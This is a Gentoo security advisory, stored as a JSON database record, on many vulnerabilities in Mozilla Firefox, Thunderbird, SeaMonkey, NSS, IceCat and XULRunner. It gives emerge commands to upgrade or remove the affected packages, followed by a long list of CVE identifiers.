Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the \u2018Mozilla Application Suite\u2019. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla\u2019s Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL\u2019s for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser\u2019s font, conduct clickjacking attacks, or have other unspecified impact. \n\nA local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nAll users of the Mozilla Firefox binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nAll users of the Mozilla Thunderbird binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.14-r1\"\n \n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.14\"\n \n\nAll NSS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/nss-3.14\"\n \n\nThe \u201cwww-client/mozilla-firefox\u201d package has been merged into the \u201cwww-client/firefox\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox\u201d and then emerge the latest \u201cwww-client/firefox\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nThe \u201cwww-client/mozilla-firefox-bin\u201d package has been merged into the \u201cwww-client/firefox-bin\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox-bin\u201d and then emerge the latest \u201cwww-client/firefox-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird\u201d package has been merged into the \u201cmail-client/thunderbird\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird\u201d and then emerge the latest \u201cmail-client/thunderbird\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird-bin\u201d package has been merged into the \u201cmail-client/thunderbird-bin\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird-bin\u201d and then emerge the latest \u201cmail-client/thunderbird-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nGentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: \n \n \n # emerge --unmerge \"www-client/icecat\"\n \n\nGentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner\"\n \n\nGentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner-bin\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2013-01-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "gentoo", "title": "Mozilla Products: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "modified": "2013-01-08T00:00:00", "id": "GLSA-201301-01", "href": "https://security.gentoo.org/glsa/201301-01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
